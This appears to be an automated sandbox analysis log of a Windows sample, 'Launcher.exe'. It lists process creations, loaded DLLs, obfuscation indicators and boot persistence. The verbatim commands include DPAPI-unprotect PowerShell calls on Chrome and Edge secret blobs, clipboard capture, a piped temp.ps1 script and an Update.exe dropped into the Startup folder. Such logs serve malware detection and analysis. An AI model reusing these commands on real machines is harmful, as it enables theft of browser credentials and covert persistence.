          Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'CurrentUser')"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'CurrentUser')
          Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'CurrentUser')"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'CurrentUser')
          Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
          Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\user\AppData\Roaming\temp.ps1 "
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: dbghelp.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: winmm.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: powrprof.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: umpdc.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: napinsp.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: pnrpnsp.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: wshbth.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: nlaapi.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: winrnr.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: dhcpcsvc.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: rasadhlp.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: fwpuclnt.dll
          Source: C:\Users\user\Desktop\Launcher.exe Section loaded: dpapi.dll
          Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: mswsock.dll
          Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: napinsp.dll
          Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: pnrpnsp.dll
          Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: wshbth.dll
          Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: nlaapi.dll
          Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: dnsapi.dll
          Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: winrnr.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
          Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
          Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
          Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
          Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
          Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
          Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
          Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
          Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
          Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
          Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
          Source: C:\Windows\System32\tasklist.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: Launcher.exe Static PE information: More than 8191 > 100 exports found
          Source: Launcher.exe Static PE information: Virtual size of .text is bigger than: 0x100000
          Source: Launcher.exe Static PE information: Image base 0x140000000 > 0x60000000
          Source: Launcher.exe Static file information: File size 59619367 > 1048576
          Source: Launcher.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x12aa000
          Source: Launcher.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xfe5c00
          Source: Launcher.exe Static PE information: More than 200 imports for KERNEL32.dll
          Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: Launcher.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.24e0b2b2d51e47b9dba34c30\node\out\Release\node.pdb\ source: Launcher.exe, 00000000.00000000.1074024698.00007FF65E41B000.00000002.00000001.01000000.00000003.sdmp
          Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.24e0b2b2d51e47b9dba34c30\node\out\Release\node.pdb source: Launcher.exe, 00000000.00000000.1074024698.00007FF65E41B000.00000002.00000001.01000000.00000003.sdmp
          Source: Binary string: D:\a\dpapi\dpapi\build\Release\dpapi.pdb source: Launcher.exe, 00000000.00000003.1398162788.00000174E0553000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394975843.00000089F5C42000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1402314759.00000174E086B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1403784383.00000174E0379000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400003763.00000174E00B6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1398162788.00000174E0508000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1407889165.00000174E06D8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: D:\a\node-sqlite3\node-sqlite3\build\Release\node_sqlite3.pdb source: Launcher.exe, 00000000.00000003.1374116741.00000174E0C11000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1380081872.00000174E0D50000.00000004.00000020.00020000.00000000.sdmp
          Source: Launcher.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Launcher.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Launcher.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Launcher.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Launcher.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

          Data Obfuscation

          Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline"
          Source: Launcher.exe Static PE information: section name: _RDATA
          Source: Update.exe.0.dr Static PE information: section name: _RDATA
          Source: b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442.0.dr Static PE information: section name: _RDATA
          Source: node_sqlite3.node.0.dr Static PE information: section name: _RDATA
          Source: node_sqlite3.node.bak.0.dr Static PE information: section name: _RDATA
          Source: 59b07c111ff3cdb6a2d6d93c23513b9ec89195f53f0a55a3a7769a9f164e6041.0.dr Static PE information: section name: _RDATA
          Source: node.napi.node.0.dr Static PE information: section name: _RDATA
          Source: node.napi.node.bak.0.dr Static PE information: section name: _RDATA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_00007FFF8F37474C push ds; retf 29_2_00007FFF8F37474F
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_00007FFF8F5D2397 push eax; iretd 29_2_00007FFF8F5D2398
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_00007FFF8F5D1D93 pushad ; iretd 29_2_00007FFF8F5D1D94
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_00007FFF8F7205FC push ebx; retf 29_2_00007FFF8F720608
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_00007FFF8F724A1D pushad ; retf 29_2_00007FFF8F724A39
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_00007FFF8F875B79 push ebp; ret 29_2_00007FFF8F875B88
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_00007FFF8F3459E6 push esp; retf 33_2_00007FFF8F3459E9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_00007FFF8F341C7D push eax; iretd 33_2_00007FFF8F341C81
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_00007FFF8F49470E push 8B48FFECh; iretd 33_2_00007FFF8F494714
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_00007FFF8F495D30 push eax; retf 33_2_00007FFF8F495D31
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_00007FFF8F497533 push ebx; iretd 33_2_00007FFF8F49753A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_00007FFF8F4978E3 push ebx; retf 33_2_00007FFF8F49793A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_00007FFF8F710AF0 push esp; retf 33_2_00007FFF8F710AF1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_00007FFF8F716C36 push es; ret 33_2_00007FFF8F716C37
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_00007FFF8F8673DB push ecx; retf 33_2_00007FFF8F8673DC
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_00007FFF8F865BEE push ss; retf 33_2_00007FFF8F865BEF
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_00007FFF8F863CE5 push edi; ret 33_2_00007FFF8F863CE6
          Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.node
          Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.dll
          Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node.bak
          Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Local\Temp\pkg-Ztzknl\59b07c111ff3cdb6a2d6d93c23513b9ec89195f53f0a55a3a7769a9f164e6041
          Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Local\Temp\pkg-Ztzknl\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442
          Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.node.bak
          Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe

          Boot Survival

          Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe
          Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe\:Zone.Identifier:$DATA
          Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
